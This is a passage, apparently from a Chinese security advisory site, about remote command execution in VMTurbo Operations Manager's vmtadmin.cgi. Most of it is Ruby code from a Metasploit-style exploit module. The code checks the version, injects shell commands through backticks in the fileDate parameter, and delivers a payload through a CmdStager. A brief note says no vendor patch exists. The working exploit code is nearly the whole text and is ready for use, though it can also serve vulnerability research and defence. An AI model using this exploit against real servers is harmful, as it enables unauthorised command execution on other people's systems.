bin/vmtadmin.cgi'远程命令执行漏洞(2)

vprint_status("#{peer} - VMTurbo Operations Manager version #{version} build #{build} detected")
    else
      vprint_status("#{peer} - Unexpected vmtadmin.cgi response")
      return Exploit::CheckCode::Unknown
    end

if version and version <= "4.6" and build < "28657"
      return Exploit::CheckCode::Appears
    else
      return Exploit::CheckCode::Safe
    end
  end

def execute_command(cmd, opts)
    begin
    res = send_request_cgi({
      'uri'    => '/cgi-bin/vmtadmin.cgi',
      'method' => 'GET',
      'vars_get' => {
        "callType" => "DOWN",
        "actionType" => "CFGBACKUP",
        "fileDate" => "\"`#{cmd}`\""
      }
    })
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
      vprint_error("#{peer} - Failed to connect to the web server")
      return nil
    end

vprint_status("Sent command #{cmd}")
  end

#
  # generate_payload_exe doesn't respect module's platform unless it's Windows, or the user
  # manually sets one. This method is a temp work-around.
  #
  def check_generate_payload_exe
    if generate_payload_exe.nil?
      fail_with(Failure::BadConfig, "#{peer} - Failed to generate the ELF. Please manually set a payload.")
    end
  end

def exploit

# Handle single command shot
    if target.name =~ /CMD/
      cmd = payload.encoded
      res = execute_command(cmd, {})

unless res
        fail_with(Failure::Unknown, "#{peer} - Unable to execute payload")
      end

print_status("#{peer} - Blind Exploitation - unknown exploitation state")
      return
    end

check_generate_payload_exe

# Handle payload upload using CmdStager mixin
    execute_cmdstager({:flavor => :printf})
  end
 end

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
vmturbo
 -------
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/b7f05393f1b9c352e0ae1ad68a0c93e8.html